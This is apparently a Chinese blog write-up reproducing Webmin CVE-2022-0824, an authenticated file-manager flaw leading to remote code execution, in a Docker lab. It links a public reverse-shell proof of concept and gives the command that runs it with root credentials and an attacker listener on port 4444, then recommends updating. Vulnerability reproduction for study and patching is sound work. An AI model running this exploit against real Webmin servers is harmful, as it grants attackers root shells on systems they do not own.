Webmin 漏洞 CVE-2022-0824复现
WEBmin简介
Webmin
是一个基于 Web
的 Linux/Unix
系统管理软件。
简单地说,就是你可以打开一个浏览器,然后输入 Webmin
的管理地址,在打开的页面中就可以管理你的 Linux/Unix
系统了。
Webmin
功能强大,可以管理设置很多东西,比如用户帐户、Apache
服务、DNS
、文件共享等等,几乎所有的东西都能给你管上一管。
Webmin
是由一个简单的 Web
服务器和一些 CGI
程序组成的系统,Web
服务器和所有 CGI
程序都是使用 Perl 5
,并且不使用非标准的 Perl
模块。
它通过管理相应的系统配置文件来实现管理目的,比如它直接通过访问编辑 /etc/passwd
来管理用户密码等等。
因此,我们可以借助 Webmin
来辅助我们学习配置 Linux
系统。
Webmin
官网首页
https://www.webmin.com/
目前最新的版本为2022年11月27日更新的Webmin 2.010
漏洞介绍
漏洞描述
在 Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行。
其他漏洞信息可以参考CVE,NVD,CNVD,CNNVD等漏洞库的披露。
漏洞编号
CVE编号:CVE-2022-0824
CNVD编号:CNVD-2022-17023
CNNVD编号::CNNVD-202203-076
危险等级:
该漏洞 CVSS:3.1评分为8.8 ,属于高危漏洞
影响版本:
Webmin Webmin < Webmin Webmin1.990 //1.990版本之前均受影响
环境搭建
webmin可以下载对应版本自行搭建,也可以直接拉取docker镜像,本次以docker镜像进行复现。
POC/EXP:已公开
POC地址
https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell
拉取漏洞镜像和访问
docker pull vulfocus/webmin_cve-2022-0824:latest
docker run -itd -p 10000:10000 -d vulfocus/webmin_cve-2022-0824
访问映射地址
127.0.0.1:10000,
root 密码: password登录
如上,漏洞环境搭建完毕。
漏洞复现
目标站点:http://127.0.0.1:10000 ,IP为192.168.171.132
攻击端:linux-kali ,IP为192.168.171.144
在攻击端监听端口4444:
将POC文件下载,并且执行利用脚本
python3 Webmin-revshell.py -t http://192.168.171.132:10000 -c root:password -LS 192.168.171.144:9090 -L 192.168.171.144 -P 4444
成功执行命令可以看到在监听端获取了root权限。
解决方案:
更新到最新版本